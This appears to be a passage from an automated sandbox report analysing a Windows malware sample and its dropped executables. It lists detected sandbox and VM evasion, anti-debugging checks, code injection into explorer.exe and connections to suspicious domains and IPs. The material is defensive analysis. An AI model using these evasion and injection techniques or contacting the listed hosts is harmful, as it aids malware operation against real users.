                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeProcess information set: NOOPENFILEERRORBOX

                          Malware Analysis System Evasion:

                          barindex
                          Found evasive API chain (may stop execution after checking mutex)Show sources
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleep
                          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                          Source: eIxMVDoQF3.exe, 00000001.00000002.332393869.0000000001FF0000.00000004.00000001.sdmpBinary or memory string: ASWHOOKUR
                          Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)Show sources
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                          Found evasive API chain (may stop execution after checking locale)Show sources
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeEvasive API call chain: GetUserDefaultLangID, ExitProcess
                          Checks if the current machine is a virtual machine (disk enumeration)Show sources
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\AppData\Roaming\rwjfsvdKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\AppData\Roaming\rwjfsvdKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\AppData\Roaming\rwjfsvdKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\AppData\Roaming\rwjfsvdKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\AppData\Roaming\rwjfsvdKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\AppData\Roaming\rwjfsvdKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)Show sources
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeEvasive API call chain: GetPEB, DecisionNodes, Sleep
                          Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)Show sources
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                          Contains functionality to detect sleep reduction / modificationsShow sources
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeCode function: 23_2_00406AA0
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeCode function: 23_2_00576CF0
                          Found evasive API chain (may stop execution after checking computer name)Show sources
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeEvasive API call chain: GetComputerName,DecisionNodes,Sleep
                          Source: C:\Windows\explorer.exe TID: 6184Thread sleep count: 577 > 30
                          Source: C:\Windows\explorer.exe TID: 6168Thread sleep count: 240 > 30
                          Source: C:\Windows\explorer.exe TID: 6192Thread sleep count: 372 > 30
                          Source: C:\Windows\explorer.exe TID: 6192Thread sleep time: -37200s >= -30000s
                          Source: C:\Windows\explorer.exe TID: 5148Thread sleep count: 397 > 30
                          Source: C:\Windows\explorer.exe TID: 7164Thread sleep count: 186 > 30
                          Source: C:\Windows\explorer.exe TID: 316Thread sleep count: 301 > 30
                          Source: C:\Windows\explorer.exe TID: 316Thread sleep time: -30100s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 1308Thread sleep time: -180000s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exe TID: 3396Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exe TID: 1716Thread sleep time: -1844674407370954s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exe TID: 5628Thread sleep count: 479 > 30
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exe TID: 5628Thread sleep count: 1992 > 30
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Users\user\AppData\Local\Temp\743F.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 577
                          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 372
                          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 397
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeWindow / User API: threadDelayed 479
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeWindow / User API: threadDelayed 1992
                          Source: C:\Users\user\AppData\Local\Temp\F805.exeAPI coverage: 2.5 %
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeAPI coverage: 6.3 %
                          Source: C:\Users\user\AppData\Local\Temp\743F.exeAPI coverage: 6.4 %
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeCode function: 23_2_00576CF0
                          Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E5C8.exeJump to dropped file
                          Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1547.exeJump to dropped file
                          Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F6C0.exeJump to dropped file
                          Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3A08.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\743F.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\tvdcssmj.exeJump to dropped file
                          Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1FD7.exeJump to dropped file
                          Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\27D7.exeJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Windows\SysWOW64\icpymrdv\tvdcssmj.exe (copy)Jump to dropped file
                          Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\6CF.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeRegistry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeEvaded block: after key decision
                          Source: C:\Users\user\AppData\Local\Temp\743F.exeEvaded block: after key decision
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeAPI call chain: ExitProcess graph end node
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeAPI call chain: ExitProcess graph end node
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeAPI call chain: ExitProcess graph end node
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeAPI call chain: ExitProcess graph end node
                          Source: explorer.exe, 0000000A.00000000.294200174.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: explorer.exe, 0000000A.00000000.294310471.0000000008778000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
                          Source: explorer.exe, 0000000A.00000000.294200174.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
                          Source: explorer.exe, 0000000A.00000000.320463158.00000000067C2000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: explorer.exe, 0000000A.00000000.320463158.00000000067C2000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
                          Source: svchost.exe, 00000003.00000002.540856275.0000015E4EE02000.00000004.00000001.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
                          Source: svchost.exe, 00000012.00000002.406449988.000001994C089000.00000004.00000001.sdmp, svchost.exe, 00000012.00000002.406654094.000001994C0D5000.00000004.00000001.sdmp, svchost.exe, 00000012.00000002.406719122.000001994C0EB000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.409739302.0000000004F53000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.409630184.0000000004FBD000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.409067816.0000000004FBD000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000002.413976379.0000000004FBD000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000002.413788318.0000000004F53000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                          Source: explorer.exe, 0000000A.00000000.294200174.00000000086C9000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
                          Source: svchost.exe, 00000003.00000002.541184831.0000015E4EE28000.00000004.00000001.sdmp, svchost.exe, 00000004.00000002.541242822.000001C48383E000.00000004.00000001.sdmp, svchost.exe, 00000005.00000002.541418484.000001EC17024000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.407410000.0000000004FBD000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeProcess information queried: ProcessInformation
                          Source: C:\Users\user\AppData\Local\Temp\743F.exeCode function: 24_2_00401D96 CreateThread,GetVersionExA,GetSystemInfo,GetModuleHandleA,GetProcAddress,GetCurrentProcess,GetTickCount,
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeCode function: 0_2_00419AC9 BuildCommDCBAndTimeoutsW,CreateMailslotA,GetNamedPipeHandleStateA,ReleaseSemaphore,FindAtomA,SystemTimeToTzSpecificLocalTime,SetComputerNameExA,SetConsoleCursorInfo,TlsGetValue,CopyFileA,GetLongPathNameA,SetVolumeMountPointW,SetProcessPriorityBoost,FreeEnvironmentStringsA,GetDriveTypeW,FindFirstFileExW,
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeCode function: 23_2_00405E40 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeCode function: 23_2_004096E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeCode function: 23_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeCode function: 23_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeCode function: 23_2_00409B40 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeCode function: 23_2_00409970 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeCode function: 23_2_004087E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeCode function: 23_2_00578A30 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeCode function: 23_2_005714D0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeCode function: 23_2_005712E0 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeCode function: 23_2_00576090 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeCode function: 23_2_00579930 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeCode function: 23_2_00579BC0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeCode function: 23_2_00579D90 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeSystem information queried: ModuleInformation

                          Anti Debugging:

                          barindex
                          Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))Show sources
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeSystem information queried: CodeIntegrityInformation
                          Source: C:\Users\user\AppData\Roaming\rwjfsvdSystem information queried: CodeIntegrityInformation
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeCode function: 0_2_0042D810 LoadLibraryW,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,
                          Source: C:\Users\user\AppData\Roaming\rwjfsvdCode function: 14_2_00570042 push dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Roaming\rwjfsvdCode function: 14_2_007B58EE push dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\F805.exeCode function: 16_2_004B0083 push dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeCode function: 23_2_00401000 mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeCode function: 23_2_0040C180 mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeCode function: 23_2_0057092B mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeCode function: 23_2_00571250 mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeCode function: 23_2_0057C3D0 mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeCode function: 23_2_00570D90 mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\743F.exeCode function: 24_2_0057092B mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\743F.exeCode function: 24_2_00570D90 mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Roaming\rwjfsvdProcess queried: DebugPort
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeCode function: 0_2_0043B860 IsDebuggerPresent,DebuggerProbe,
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeCode function: 23_2_004048D0 VirtualProtect ?,00000004,00000100,00000000
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeCode function: 0_2_0042CC12 InterlockedIncrement,__itow_s,__invoke_watson_if_error,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,__strftime_l,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,_wcscpy_s,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,__snwprintf_s,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,GetFileType,_wcslen,WriteConsoleW,GetLastError,__invoke_watson_if_oneof,_wcslen,WriteFile,WriteFile,OutputDebugStringW,__itow_s,__invoke_watson_if_error,___crtMessageWindowW,
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeCode function: 0_2_00419D12 SetLastError,GetProfileStringA,WriteProfileSectionW,GetProfileStringA,GetLastError,GetSystemWow64DirectoryW,GetWindowsDirectoryA,GetCPInfoExA,GetDiskFreeSpaceExA,GetStartupInfoW,ReadConsoleOutputCharacterW,GlobalUnWire,GetProcessHeap,GetProcessHeaps,WritePrivateProfileStringA,GetPriorityClass,
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeCode function: 1_1_004027ED LdrLoadDll,
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeMemory protected: page guard
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeCode function: 0_2_0043AC20 _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeCode function: 0_2_0042BD50 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeCode function: 0_2_00422D00 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeCode function: 0_2_004285B0 SetUnhandledExceptionFilter,
                          Source: C:\Users\user\AppData\Local\Temp\F805.exeCode function: 16_2_0040976C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                          Source: C:\Users\user\AppData\Local\Temp\743F.exeCode function: 24_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,

                          HIPS / PFW / Operating System Protection Evasion:

                          barindex
                          System process connects to network (likely due to code injection or exploit)Show sources
                          Source: C:\Windows\explorer.exeDomain query: cdn.discordapp.com
                          Source: C:\Windows\explorer.exeNetwork Connect: 188.166.28.199 80
                          Source: C:\Windows\explorer.exeDomain query: unicupload.top
                          Source: C:\Windows\explorer.exeNetwork Connect: 185.233.81.115 187
                          Source: C:\Windows\explorer.exeNetwork Connect: 185.7.214.171 144
                          Source: C:\Windows\explorer.exeDomain query: host-data-coin-11.com
                          Source: C:\Windows\explorer.exeDomain query: goo.su
                          Source: C:\Windows\explorer.exeDomain query: transfer.sh
                          Source: C:\Windows\explorer.exeDomain query: a0621298.xsph.ru
                          Source: C:\Windows\explorer.exeNetwork Connect: 185.186.142.166 80
                          Source: C:\Windows\explorer.exeDomain query: data-host-coin-8.com
                          Benign windows process drops PE filesShow sources
                          Source: C:\Windows\explorer.exeFile created: E5C8.exe.10.drJump to dropped file
                          Maps a DLL or memory area into another processShow sources
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                          Source: C:\Users\user\AppData\Roaming\rwjfsvdSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                          Source: C:\Users\user\AppData\Roaming\rwjfsvdSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                          Injects a PE file into a foreign processesShow sources
                          Source: C:\Users\user\AppData\Roaming\rwjfsvdMemory written: C:\Users\user\AppData\Roaming\rwjfsvd base: 400000 value starts with: 4D5A
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeMemory written: C:\Users\user\AppData\Local\Temp\7D0A.exe base: 400000 value starts with: 4D5A
                          Contains functionality to inject code into remote processesShow sources
                          Source: C:\Users\user\AppData\Roaming\rwjfsvdCode function: 14_2_00570110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                          Creates a thread in another existing process (thread injection)Show sources
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeThread created: C:\Windows\explorer.exe EIP: 2E21930
                          Source: C:\Users\user\AppData\Roaming\rwjfsvdThread created: unknown EIP: 5DE1930
                          .NET source code references suspicious native API functionsShow sources
                          Source: 7D0A.exe.10.dr, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 7D0A.exe.10.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: 25.2.7D0A.exe.d70000.0.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 25.2.7D0A.exe.d70000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: 25.0.7D0A.exe.d70000.0.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 25.0.7D0A.exe.d70000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
